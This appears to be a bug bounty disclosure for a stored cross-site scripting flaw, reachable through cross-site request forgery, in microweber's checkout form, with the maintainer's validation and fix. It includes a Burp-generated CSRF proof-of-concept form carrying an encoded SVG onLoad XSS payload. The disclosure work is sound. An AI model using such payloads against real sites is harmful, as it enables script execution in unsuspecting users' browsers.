Cross-site Scripting (XSS) - Stored in microweber/microweber


Reported on

Jun 25th 2021

✍️ Description

Hello, I found CSRF + XSS on the website, so the impact of the XSS could be presented.

There is no CSRF token or protection on:

CSRF HTML PoC:

  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <!-- Burp entity-encodes the form values; the browser decodes them before sending,
       so first_name/last_name are submitted as: "><svg onLoad=alert(5555)> -->
  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="first&#95;name" value="&quot;&gt;&lt;svg&#32;onLoad&#61;alert&#40;5555&#41;&gt;" />
      <input type="hidden" name="last&#95;name" value="&quot;&gt;&lt;svg&#32;onLoad&#61;alert&#40;5555&#41;&gt;" />
      <input type="hidden" name="email" value="asdf&#64;gmail&#46;com" />
      <input type="hidden" name="phone" value="000000000" />
      <input type="submit" value="Submit request" />
    </form>

and when we submit the request, the XSS gets executed at the same time. Also, the personal information always stays there, so it counts as Stored XSS.

Video of me showing everything:

💥 Impact

JS executed in the victim's browser while the person is in Checkout.

2 years ago


Hey kirareys, since I was not able to find a security policy or other method of contact, I've created an issue on the repo asking a way to responsibly disclose this vulnerability. Waiting to hear back; good job!

We have contacted a member of the microweber team and are waiting to hear back 2 years ago
microweber/microweber maintainer validated this vulnerability 2 years ago
kirareys has been awarded the disclosure bounty
The fix bounty is now up for grabs
microweber/microweber maintainer marked this as fixed with commit 846a63 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
microweber/microweber maintainer
2 years ago


Hello, thanks for the report, this is a valid issue and has been fixed now in this commit

2 years ago


Nice, thanks for the attention :) Regards
